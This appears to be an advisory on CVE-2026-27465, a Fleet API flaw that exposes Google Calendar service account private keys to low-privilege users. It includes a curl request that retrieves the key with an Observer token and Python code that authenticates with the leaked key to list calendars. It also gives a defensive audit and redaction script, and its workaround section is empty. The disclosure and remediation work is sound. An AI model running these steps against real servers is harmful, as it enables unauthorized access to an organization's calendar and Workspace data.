Summary:
A recent vulnerability, CVE-2026-27465, affects Fleet, the popular open source device management software. Versions prior to 4.80.1 expose Google Calendar service account credentials via a misconfigured API. This allows even low-privilege users (“Observer” role) to retrieve sensitive service account keys, giving them unauthorized access to your organization’s Google Calendar (and potentially other Google Workspace resources).

What is Fleet?

Fleet is a widely used tool for device management across organizations. It lets administrators manage device policies, run queries, and integrate with other services, like Google Calendar for scheduling.

The Vulnerability in Simple Terms

- Who’s affected: Organizations running Fleet versions before 4.80.1 with Google Calendar integration enabled.
- What happened: The configuration API endpoint (/api/v1/fleet/config) returned sensitive Google Calendar service account credentials, including the private key, even to users with the lowest possible privileges (Observers).
- Impact: Anyone with authenticated access (including Observers) could grab the private key and impersonate the trusted Google service account outside of Fleet, gaining unauthorized access to calendar data—or other Google Workspace assets linked to that account.

How the Leak Happens

The Fleet backend includes a configuration API, which is used to fetch (and sometimes update) integration credentials. A normal GET request might return sanitized data — but here, the private key field was included in the JSON payload for ALL authenticated users.

API Request Example

curl -s -X GET -H "Authorization: Bearer $OBSERVER_TOKEN" \
  https://fleet.example.org/api/v1/fleet/config

Response (Sensitive data revealed)

{
  "integrations": {
    "google_calendar": {
      "enabled": true,
      "service_account": {
        "type": "service_account",
        "project_id": "my-corp-calendar",
        "private_key_id": "xxxxxxx",
        "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEvAIBADAN...END PRIVATE KEY-----\n",
        "client_email": "fleet-calendar@my-corp-calendar.iam.gserviceaccount.com",
        ...
      }
    }
  }
}

The private_key field should never be visible to low-privileged users.
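As an added example that is not Fleet's own code, the Python below audits a decoded /api/v1/fleet/config response of the shape shown above for an unmasked private key, and shows the role-based redaction a fixed server should apply before answering non-admin users. The sample config is constructed, and the "admin"/"observer" role labels and the masking convention are assumptions made here.

```python
from copy import deepcopy
from typing import Any

MASK = "********"

# Constructed sample in the response shape shown above (all values are fake).
SAMPLE_CONFIG = {
    "integrations": {"google_calendar": {
        "enabled": True,
        "service_account": {
            "private_key_id": "xxxxxxx",
            "private_key": "-----BEGIN PRIVATE KEY-----\nFAKE\n-----END PRIVATE KEY-----\n",
            "client_email": "fleet-calendar@my-corp-calendar.iam.gserviceaccount.com",
        },
    }}
}

def _entries(node: Any):
    """(key, value) pairs of a dict or list node; scalar leaves yield nothing."""
    if isinstance(node, dict):
        return node.items()
    if isinstance(node, list):
        return enumerate(node)
    return []

def _is_secret(key: Any, value: Any) -> bool:
    # Match the documented key name, and any PEM body in case a field is renamed.
    return key == "private_key" or (isinstance(value, str) and value.startswith("-----BEGIN"))

def leaked_fields(config: Any, path: str = "") -> list[str]:
    """Dotted paths of every secret that is present and not already masked."""
    found: list[str] = []
    for key, value in _entries(config):
        here = f"{path}.{key}" if path else str(key)
        if _is_secret(key, value) and value not in ("", MASK):
            found.append(here)
        found.extend(leaked_fields(value, here))
    return found

def redact_for_role(config: dict, role: str) -> dict:
    """What a fixed server should return: admins keep secrets, everyone else gets masks."""
    if role == "admin":
        return deepcopy(config)
    return _scrub(deepcopy(config))

def _scrub(node: Any) -> Any:
    for key, value in _entries(node):
        node[key] = MASK if _is_secret(key, value) else _scrub(value)
    return node
```

Running leaked_fields over a response fetched with a low-privilege token is a quick way to confirm whether an instance still exposes the key after an upgrade.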

With the private key and service account details, an attacker can:

1. Impersonate the service account: Using Google APIs, they can authenticate as the service account.
2. Access calendar events: Read, edit, or delete calendar events for any resource the account can see.
3. (Worse) Access other linked Google Workspace data: If the service account has broader privileges, other data may be at risk.

Save the JSON credentials to service_account.json, then use the Google API Python client:

from google.oauth2 import service_account
from googleapiclient.discovery import build

creds = service_account.Credentials.from_service_account_file(
    "service_account.json",
    scopes=["https://www.googleapis.com/auth/calendar.readonly"],
)
service = build("calendar", "v3", credentials=creds)

calendar_list = service.calendarList().list().execute()
print(calendar_list)

If successful, this prints every calendar the service account can access, using nothing more than the credentials an Observer (or anyone else with a Fleet login) can fetch from the config endpoint.

Security Implications

- Privilege Escalation within Fleet: *Not possible* — the bug does not grant additional Fleet permissions.
- Access to Google Calendar: *Possible* — attacker can read or manipulate calendars, and potentially other Google APIs if the account has those permissions.

How to Fix

1. Upgrade Fleet to 4.80.1 or later
This version fixes the bug, ensuring credentials are not exposed to non-admin roles.

2. If upgrade isn’t possible:

References

- Fleet Security Advisory (look for CVE-2026-27465)
- Official Release notes for 4.80.1
- Google Service Accounts Documentation

Conclusion

CVE-2026-27465 is a reminder that even “observer-level” users can pose a risk if backends are too liberal with sensitive fields. If your Fleet server is affected, patch as soon as possible and rotate your Google API credentials. Always limit service account access to exactly what’s needed.

Stay secure!


Timeline

Published on: 02/26/2026 02:54:04 UTC
Last modified on: 02/27/2026 14:06:59 UTC